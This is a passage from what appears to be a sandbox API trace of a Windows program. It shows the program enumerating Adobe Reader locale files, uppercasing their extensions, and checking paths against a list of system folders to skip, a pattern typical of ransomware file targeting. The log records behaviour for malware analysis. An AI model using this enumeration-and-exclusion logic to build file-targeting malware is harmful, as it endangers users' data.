ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.604] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xbab1, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.604] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dfea540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.UKR", cAlternateFileName="")) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f50a880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Updater.UKR", cAlternateFileName="")) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830d9140, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.UKR", cAlternateFileName="")) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830d9140, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.UKR", cAlternateFileName="")) returned 0 [0058.604] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d6d7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0058.604] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d6d7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d6d7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9aab80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.CHS", cAlternateFileName="ACCESS~1.CHS")) returned 1 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3cc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.CHS", cAlternateFileName="")) returned 1 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8051bd00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.CHS", cAlternateFileName="ADOBEC~1.CHS")) returned 1 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e519e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.CHS", cAlternateFileName="")) returned 1 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820558a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.CHS", cAlternateFileName="BRDLAN~1.CHS")) returned 1 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82db9460, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.CHS", cAlternateFileName="")) returned 1 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.CHS", cAlternateFileName="")) returned 1 [0058.609] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82db9460, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.CHS", cAlternateFileName="")) returned 1 [0058.610] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.CHS", cAlternateFileName="")) returned 1 [0058.610] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.610] CharUpperBuffW (in: lpsz="eBook.CHS", cchLength=0x9 | out: lpsz="EBOOK.CHS") returned 0x9 [0058.610] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.CHS", cAlternateFileName="")) returned 1 [0058.610] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.610] CharUpperBuffW (in: lpsz="EScript.CHS", cchLength=0xb | out: lpsz="ESCRIPT.CHS") returned 0xb [0058.610] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.CHS", cAlternateFileName="")) returned 1 [0058.610] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.610] CharUpperBuffW (in: lpsz="IA32.CHS", cchLength=0x8 | out: lpsz="IA32.CHS") returned 0x8 [0058.610] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db99d60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9400, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.CHS", cAlternateFileName="MAKEAC~1.CHS")) returned 1 [0058.610] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.610] CharUpperBuffW (in: lpsz="makeaccessible.CHS", cchLength=0x12 | out: lpsz="MAKEACCESSIBLE.CHS") returned 0x12 [0058.610] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.CHS", cAlternateFileName="MULTIM~1.CHS")) returned 1 [0058.610] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.610] CharUpperBuffW (in: lpsz="Multimedia.CHS", cchLength=0xe | out: lpsz="MULTIMEDIA.CHS") returned 0xe [0058.610] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d984a20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.CHS", cAlternateFileName="")) returned 1 [0058.610] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.610] CharUpperBuffW (in: lpsz="pddom.CHS", cchLength=0x9 | out: lpsz="PDDOM.CHS") returned 0x9 [0058.611] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4dc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLITE.CHS", cAlternateFileName="")) returned 1 [0058.611] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.611] CharUpperBuffW (in: lpsz="PPKLITE.CHS", cchLength=0xb | out: lpsz="PPKLITE.CHS") returned 0xb [0058.611] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f556b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe0600, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.CHS", cAlternateFileName="")) returned 1 [0058.611] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.611] CharUpperBuffW (in: lpsz="RdLang32.CHS", cchLength=0xc | out: lpsz="RDLANG32.CHS") returned 0xc [0058.611] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.CHS", cAlternateFileName="READOU~1.CHS")) returned 1 [0058.611] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.611] CharUpperBuffW (in: lpsz="ReadOutLoud.CHS", cchLength=0xf | out: lpsz="READOUTLOUD.CHS") returned 0xf [0058.611] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da1cfa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.CHS", cAlternateFileName="")) returned 1 [0058.611] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.611] CharUpperBuffW (in: lpsz="reflow.CHS", cchLength=0xa | out: lpsz="REFLOW.CHS") returned 0xa [0058.611] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da1cfa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.CHS", cAlternateFileName="SAVEAS~1.CHS")) returned 1 [0058.611] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.611] CharUpperBuffW (in: lpsz="SaveAsRTF.CHS", cchLength=0xd | out: lpsz="SAVEASRTF.CHS") returned 0xd [0058.611] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.CHS", cAlternateFileName="")) returned 1 [0058.611] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.611] CharUpperBuffW (in: lpsz="Search.CHS", cchLength=0xa | out: lpsz="SEARCH.CHS") returned 0xa [0058.612] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.CHS", cAlternateFileName="")) returned 1 [0058.612] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.612] CharUpperBuffW (in: lpsz="SendMail.CHS", cchLength=0xc | out: lpsz="SENDMAIL.CHS") returned 0xc [0058.612] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.612] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.612] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.612] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.612] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.612] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.612] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.612] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.612] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.612] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.612] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 